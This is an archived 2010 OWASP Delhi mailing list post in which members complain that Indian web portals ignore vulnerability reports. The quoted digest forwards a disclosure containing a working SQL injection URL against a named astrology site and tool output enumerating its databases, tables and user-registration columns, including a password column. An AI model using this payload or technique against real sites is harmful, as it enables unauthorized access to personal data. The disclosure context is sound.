[Owasp-delhi] Owasp-delhi Digest, Vol 35, Issue 9

subhasis subha83 at gmail.com
Wed Jun 16 03:41:37 EDT 2010


As a responsible infosec person,everytime we try to wake up these Big
Industries Management (government/private/public),but they feel that their
job is permanent and secure so as their webservers and applications.

They are very careless to take necessary security measures even after proof
of vulnerability and sometimes they forget to reply.

In India,78% of all companies or sectors believe "we are secure because no
one is attacking". They have one more strong thinking that "It is easier to
show 'site under maintenance' and backup all hacked data rather than putting
security to protect those data".

Indirectly they are responsible themselves for promoting US/Chinese/Russian
hackers the song "come,play and win (hack) our valuable national websites".

With regards,

subhasis
On Wed, Jun 16, 2010 at 2:48 PM, <owasp-delhi-request at lists.owasp.org>wrote:

> Send Owasp-delhi mailing list submissions to
>        owasp-delhi at lists.owasp.org
>
> To subscribe or unsubscribe via the World Wide Web, visit
>        https://lists.owasp.org/mailman/listinfo/owasp-delhi
> or, via email, send a message with subject or body 'help' to
>        owasp-delhi-request at lists.owasp.org
>
> You can reach the person managing the list at
>        owasp-delhi-owner at lists.owasp.org
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Owasp-delhi digest..."
>
>
> Today's Topics:
>
>   1. Re: Rediff Astrology (Subhash Dutta)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Wed, 16 Jun 2010 09:08:45 +0530 (IST)
> From: Subhash Dutta <subhash.dutta at kriss.in>
> Subject: Re: [Owasp-delhi] Rediff Astrology
> To: Sripathi Krishnan <sripathi.krishnan at gmail.com>
> Cc: owasp-delhi <owasp-delhi at lists.owasp.org>
> Message-ID: <[email protected]>
> Content-Type: text/plain; charset="utf-8"
>
> Yes I have also noted the same. In fact, the imint card company stores
> passwords as reversible encrypted and will tell you in plain text what your
> password is in case you have forgotten it ;). When brought to their notice,
> I received a standard reply - Thanking for contacting us, we will get back
> to you shortly. Nobody has got back till date (1 year past). I think strong
> legislative punitive measures are the only solution.
>
> Regards
>
> Subhash Dutta
>
>
> ----- Original Message -----
> From: "Sripathi Krishnan" <sripathi.krishnan at gmail.com>
> To: "dhruv soi" <dhruv.soi at owasp.org>
> Cc: owasp-delhi at lists.owasp.org, owasp-mumbai at lists.owasp.org,
> owasp-bangalore at lists.owasp.org
> Sent: Monday, June 14, 2010 11:25:23 PM GMT +05:30 Chennai, Kolkata,
> Mumbai, New Delhi
> Subject: Re: [Owasp-delhi] Rediff Astrology
>
> Its not just rediff.com , almost all other Indian portals - in.com ,
> indiatimes.com and sify.com have similar problems. XSS, XSRF, SQL
> Injection, Poor password/session management, open redirects .. the list is
> endless.
>
>
> I have written to each of the above portals several times in the past year,
> and have given up. IMHO, they are not interested in securing their websites.
>
>
>
>
> --Sri
>
>
>
> On 14 June 2010 23:17, Soi, Dhruv < dhruv.soi at owasp.org > wrote:
>
>
>
>
>
>
> Another one to notify Rediff that readers? daily fortune can be fixed by
> someone?Seems Rediff needs a lot of OWASP, do inform them that its free!!
>
>
>
>
> From: ?Jack H4xor?
> Sent: 14 June 2010 12:07
> To: dhruv.soi at owasp.org
> Subject: Rediff Astrology
>
>
>
> y0,
>
>
> h0rr1bl3 th4n h0rr0r
>
> Vulnerable Url :
>
>
> http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Scorpiox%27%20OR%201=convert%28int,@@version%29--
>
> ********************************************************************
> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>
>
> + -== MSSQL Information Schema astrology.rediff.com ==- +
>
>
> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>
>
> [ + ] URL : http : //
> astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzo
>
> diac = Scorpiox '
>
>
> [ + ] Date: Tue May 18 20:58:26 2010
> [ + ] Displaying information about MSSQL host !
>
> [ + ] @@VERSION ?: ? ? ?Microsoft SQL Server ?2000 - 8.00.194 (Intel X86)
>
> Aug ?6 2000 00:57:48
> Copyright (c) 1988-2000 Microsoft Corporation
> Standard Edition on Windows NT 5.0 (Build 2195: Service
> Pack 4)
>
> [ + ] USER () ? ? ? ? ?: dbo
>
> [ + ] S_USER () ? ? ? ?: astrology
> [ + ] DB_NAME () ? ? ? : astro
> [ + ] HOST_NAME () ? ? : ASTROLOGY
> [ + ] SERVER_NAME () ? : SEARCHDB
> [ + ] SERVER_TYPE () ? : Microsoft-IIS/6.0
> [ + ] X-POWERED-By () ?: ASP.NET <http://asp.net/>
>
> [ + ] IP_ADDRESS_INFO ?: 202.54.124.173
>
>
> [ - ] We Can' t get number of Datab a ses !
>
>
> [ ! ] Start dumping database Names !
>
> [ ? ] But first choice number of DB to dump :> 20
>
>
> [ + ] Displaying list of 20 databases on this MSSQL host !
>
>
> [ DATABASE : 0 ] : astro
>
> [ DATABASE : 1 ] : master
>
> [ DATABASE : 2 ] : tempdb
>
> [ DATABASE : 3 ] : model
>
> [ DATABASE : 4 ] : msdb
>
> [ DATABASE : 5 ] : pubs
>
> [ DATABASE : 6 ] : Northwind
>
> [ DATABASE : 7 ] : travel
>
> [ DATABASE : 8 ] : travel_int
>
> [ DATABASE : 9 ] : astro
>
> [ DATABASE : 10 ] : Jobsearch
>
> [ DATABASE : 11 ] : astroyogiD
>
> [ DATABASE : 12 ] : matrimonial
>
> [ DATABASE : 13 ] : investornew
>
> [ DATABASE : 14 ] : test
>
>
> [ ! ] Vulnerability Database is : astro
>
>
> [ + ] Displaying Tables inside DB :> astro
>
>
> [ ? ] Numbers of Tables To Dispaly ?
>
> [ + ] Specify Numbers :> 200
>
>
> [ TABLES : 0 ] : ALLIANCE_PARTNER_COMMISSION
>
> [ TABLES : 1 ] : ALLIANCE_PARTNER_MASTER
>
> [ TABLES : 2 ] : astrolove
>
> [ TABLES : 3 ] : astroparent
>
> [ TABLES : 4 ] : CITY
>
> [ TABLES : 5 ] : COMPLETE_ORDER_DETAIL
>
> [ TABLES : 6 ] : COMPLETE_SUBSCRIPTION_DETAIL
>
> [ TABLES : 7 ] : COUNTRY
>
> [ TABLES : 8 ] : CUSTOMER_CARE_DETAILS
>
> [ TABLES : 9 ] : CUSTOMER_CARE_MASTER
>
> [ TABLES : 10 ] : CUSTOMER_PERSON1
>
> [ TABLES : 11 ] : CUSTOMER_PERSON2
>
> [ TABLES : 12 ] : CUSTOMER_PERSON3
>
> [ TABLES : 13 ] : darshtest
>
> [ TABLES : 14 ] : dtproperties
>
> [ TABLES : 15 ] : FENGSHUI
>
> [ TABLES : 16 ] : FRANCHISEE_MASTER
>
> [ TABLES : 17 ] : idealmate
>
> [ TABLES : 18 ] : INTERNATIONAL_PARTNER_MASTER
>
> [ TABLES : 19 ] : NUMEROLOGY
>
> [ TABLES : 20 ] : ORDER_DETAILS
>
> [ TABLES : 21 ] : ORDER_MASTER
>
> [ TABLES : 22 ] : ORDER_REMARKS
>
> [ TABLES : 23 ] : ORDERS
>
> [ TABLES : 24 ] : p1
>
> [ TABLES : 25 ] : p3master
>
> [ TABLES : 26 ] : PALMISTRY
>
> [ TABLES : 27 ] : PAYMENT_METHOD_MASTER
>
> [ TABLES : 28 ] : PROBLEM_ANSWER
>
> [ TABLES : 29 ] : PROBLEM_CATEGORY
>
> [ TABLES : 30 ] : REGISTRATION
>
> [ TABLES : 31 ] : SHIPPING_DETAILS
>
> [ TABLES : 32 ] : SPCFIC_ANLYS
>
> [ TABLES : 33 ] : SUBSCRIBER_DETAILS
>
> [ TABLES : 34 ] : SUBSCRIBER_MASTER
>
> [ TABLES : 35 ] : SUBSCRIBER_REGISTRATION
>
> [ TABLES : 36 ] : SUBSCRIBER_TRANSACTION
>
> [ TABLES : 37 ] : SUBSCRIPTION_DETAILS
>
> [ TABLES : 38 ] : SUBSCRIPTION_MASTER
>
> [ TABLES : 39 ] : sysconstraints
>
> [ TABLES : 40 ] : syssegments
>
> [ TABLES : 41 ] : test
>
> [ TABLES : 42 ] : USER_ASTROLOGER_PRODUCT_TRANSACTION
>
> [ TABLES : 43 ] : zodiac
>
>
> [ + ] Done !
>
>
> [ + ] Start dumping all Columns from table :> REGISTRATION
>
>
> [ ? ] Numbers of Columns To Display ?
>
> [ + ] Specify Numbers :> 50
>
>
> [ + ] Displaying 50 Columns inside Table : REGISTRATION and Database :
> astro
>
>
> [ COLUMNS : REGISTRATION ] 0 ] : FRANCHISEE_ID
>
> [ COLUMNS : REGISTRATION ] 1 ] : PARTNER_ID
>
> [ COLUMNS : REGISTRATION ] 2 ] : REGISTRATION_ADDRESS
>
> [ COLUMNS : REGISTRATION ] 3 ] : REGISTRATION_BIRTH_COUNTRY
>
> [ COLUMNS : REGISTRATION ] 4 ] : REGISTRATION_BIRTH_DATE
>
> [ COLUMNS : REGISTRATION ] 5 ] : REGISTRATION_BIRTH_PLACE
>
> [ COLUMNS : REGISTRATION ] 6 ] : REGISTRATION_BIRTH_TIME_HOUR
>
> [ COLUMNS : REGISTRATION ] 7 ] : REGISTRATION_BIRTH_TIME_MINUTES
>
> [ COLUMNS : REGISTRATION ] 8 ] : REGISTRATION_CELL_NO
>
> [ COLUMNS : REGISTRATION ] 9 ] : REGISTRATION_COUNTRY
>
> [ COLUMNS : REGISTRATION ] 10 ] : REGISTRATION_DATE
>
> [ COLUMNS : REGISTRATION ] 11 ] : REGISTRATION_EMAIL_ID
>
> [ COLUMNS : REGISTRATION ] 12 ] : REGISTRATION_FIRSTNAME
>
> [ COLUMNS : REGISTRATION ] 13 ] : REGISTRATION_GENDER
>
> [ COLUMNS : REGISTRATION ] 14 ] : REGISTRATION_ID
>
> [ COLUMNS : REGISTRATION ] 15 ] : REGISTRATION_IP
>
> [ COLUMNS : REGISTRATION ] 16 ] : REGISTRATION_LASTNAME
>
> [ COLUMNS : REGISTRATION ] 17 ] : REGISTRATION_PASSWORD
>
> [ COLUMNS : REGISTRATION ] 18 ] : REGISTRATION_TELEPHONE_NO
>
> [ COLUMNS : REGISTRATION ] 19 ] : REGISTRATION_USERNAME
>
>
> [ ! ] Done !
>
>
> [ ! ] All information was recorded in astrology . rediff . com . txt file !
>
>
> [ 1 ] : Return to Tables !
>
> [ 2 ] : Return to Columns !
>
>
> [ ? ] : Oprion :>
>
>
>
> Thanks & Regards
> Jackh4xor
> ( h4cky0u )
> _______________________________________________
> Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
>
>
> _______________________________________________ Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> https://lists.owasp.org/pipermail/owasp-delhi/attachments/20100616/a1b26cf2/attachment.html
>
> ------------------------------
>
> _______________________________________________
> Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
>
> End of Owasp-delhi Digest, Vol 35, Issue 9
> ******************************************
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-delhi/attachments/20100616/212c2923/attachment.html 


More information about the Owasp-delhi mailing list